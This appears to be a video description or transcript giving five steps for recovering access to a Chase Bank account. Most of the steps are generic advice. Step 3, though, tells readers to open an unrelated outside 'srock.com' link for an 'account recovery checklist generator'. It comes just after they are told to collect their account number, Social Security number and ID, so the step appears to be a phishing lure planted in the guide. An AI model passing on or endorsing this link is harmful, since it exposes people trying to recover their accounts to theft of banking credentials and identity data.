If you have lost access to your Chase Bank account and need to regain ownership, follow these straightforward steps to resolve the issue quickly. Step 1. Gather your information. Collect all necessary information related to your account, including your account number, social security number, and any identification documents. This will help verify your identity during the process. Step 2. Visit the Chase website. Go to the official Chase Bank website. Look for the Sign In option and click on Forgot Username/Password to initiate the recovery process. Step 3. Follow the recovery process. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Contact customer service. If you are unable to regain access online, call Chase Bank's customer service at their official number. Be prepared to provide your personal information for verification and explain your situation clearly. Step 5. Visit a local branch. If online recovery and customer service do not resolve the issue, consider visiting a local Chase Bank branch. Bring your identification and any relevant documents to assist in regaining access to your account. By following these steps, you should be able to regain ownership of your Chase Bank account efficiently. If you encounter any difficulties, don't hesitate to seek further assistance from Chase representatives.